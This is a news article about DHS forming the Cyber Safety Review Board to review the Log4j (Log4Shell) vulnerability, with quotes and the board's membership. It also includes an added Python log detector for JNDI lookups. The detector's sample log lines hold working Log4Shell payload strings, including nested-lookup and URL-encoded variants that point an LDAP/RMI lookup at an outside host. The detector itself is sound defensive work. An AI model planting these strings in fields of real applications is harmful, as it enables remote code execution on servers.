The Department of Homeland Security (DHS) has launched a Cyber Safety Review Board, which will bring together private and public sector industry leaders to assess “significant cybersecurity events” with the aim of identifying and sharing the lessons learned from them.
The board's first assessment will center on the critical flaw discovered late last year in the Apache Log4j logging library. It will be tasked with forming recommendations based on its review of that incident, rather than acting as a regulatory or enforcement authority.
“At the President’s direction, DHS is establishing the Cyber Safety Review Board to thoroughly assess past events, ask the hard questions, and drive improvements across the private and public sectors," said Secretary of Homeland Security Alejandro N. Mayorkas in a Thursday statement. "I look forward to reviewing the Board’s recommendations regarding how we can better protect communities across our country as DHS works to build a more secure digital future.”
The Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell) lies in a Java logging library that is embedded in an enormous number of Java applications, so its reach extends to millions of third-party enterprise applications, cloud services and devices. An attacker who can get a crafted string, such as a JNDI lookup, into a field that the application logs can trigger remote code execution on the server. Even as vendors raced to issue updates addressing the flaw, researchers in December reported a "sharply increasing" number of exploitation attempts.
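The exploitation attempts mentioned above mostly arrived as `${jndi:...}` lookup strings planted in HTTP headers and query strings, frequently obfuscated with nested Log4j lookups and URL-encoding. The following detector is an added example, not code from the article or from the Log4j project; it relies only on the documented Log4j 2 lookup syntax (`${lower:x}`, `${upper:x}` and the `${name:-default}` fallback form) and runs over a handful of constructed access-log lines that are not taken from any real system.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article or any real system).
# Line 0 is benign; lines 1-3 carry Log4Shell-style JNDI lookups, the last two
# obfuscated with nested lookups and URL-encoding as seen in the wild.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Armi%3A%2F%2F198.51.100.9%2Fx%7D"',
]

# Innermost lookups attackers use only to hide the literal "jndi":
# ${lower:X} / ${upper:X} evaluate to X, and ${name:-X} (including the
# empty-name form ${::-X}) evaluates to the default X when the lookup fails.
OBFUSCATION_LOOKUPS = [
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}"),
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),
]
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}?")


def normalize(line: str, max_rounds: int = 5) -> str:
    """URL-decode repeatedly, lowercase, then collapse obfuscation lookups
    innermost-first until the string stops changing."""
    text = line
    for _ in range(max_rounds):  # bounded: multiply-encoded payloads are common
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()
    for _ in range(max_rounds * 4):  # each pass strips one layer of nesting
        before = text
        for pattern in OBFUSCATION_LOOKUPS:
            text = pattern.sub(r"\1", text)
        if text == before:
            break
    return text


def find_jndi_lookups(lines):
    """Return (line_index, normalized_lookup) for every line that still carries
    a ${jndi:...} lookup after normalization."""
    hits = []
    for idx, line in enumerate(lines):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((idx, match.group(0)))
    return hits


if __name__ == "__main__":
    for idx, lookup in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {idx}: {lookup}")
```

The normalization step is the point: matching the literal `${jndi:` alone misses the nested and percent-encoded variants, while matching on any `${` produces noise on applications that log template-like text. Collapsing only the lookup forms that attackers actually used to split the keyword keeps the check both specific and cheap enough to run over web-server logs in bulk.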
Board members will review and assess the Log4j vulnerability, how it is being exploited by various threat actors, and the actions taken by the government and private sector to mitigate the impact. In addition, the board will be tasked with making recommendations for addressing any ongoing vulnerabilities and threat activity related to Log4j, for improving cybersecurity and incident response practices, and for enhancing policies based on the lessons learned from the flaw. The board will deliver a public version of a report on its findings over the summer.
The board is made up of 15 members from both the private sector and government, led by Robert Silvers, DHS undersecretary for Policy, as Chair, and Heather Adkins, Google’s senior director for Security Engineering, as Deputy Chair. Other members include Chris Inglis, national cyber director with the Office of the National Cyber Director; Katie Moussouris, founder and CEO of Luta Security; Rob Joyce, director of cybersecurity with the National Security Agency; and Kemba Walden, assistant general counsel of the Digital Crimes Unit with Microsoft. The Cybersecurity and Infrastructure Security Agency (CISA) will manage and fund the board, with CISA Director Jen Easterly in charge of appointing members and convening the board following significant cybersecurity events.
The establishment of the board was mandated as part of President Joe Biden’s Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity. Over the past year, the EO has resulted in several security-focused government initiatives, including a National Security Memorandum, signed in January, which aims to better secure the information systems that store and process classified data across various federal agencies; as well as a zero-trust implementation strategy developed and finalized in January.
“The new Cyber Safety Review Board looks like it could be quite valuable,” said Ray Kelly, fellow at NTT Application Security. “In-depth review of major security incidents with recommendations for remediation and incident response practices can certainly be useful for organizations. We’ll have to wait and see how the first report looks when they address the critical and ever-expanding Log4j vulnerability to determine if the level of detail and guidance is going to be helpful.”
Casey Ellis, founder and CTO at Bugcrowd, said the Log4j flaw revealed a "raft of adjacent and systemic weaknesses" on a large scale, such as open-source supply chain security, grappling with both unsophisticated and sophisticated adversaries simultaneously, as well as post-patch product recertification and regression analysis.
"Hopefully, the Cyber Safety Review Board will focus on these broader lessons and consequences, and not just Log4j itself," said Ellis.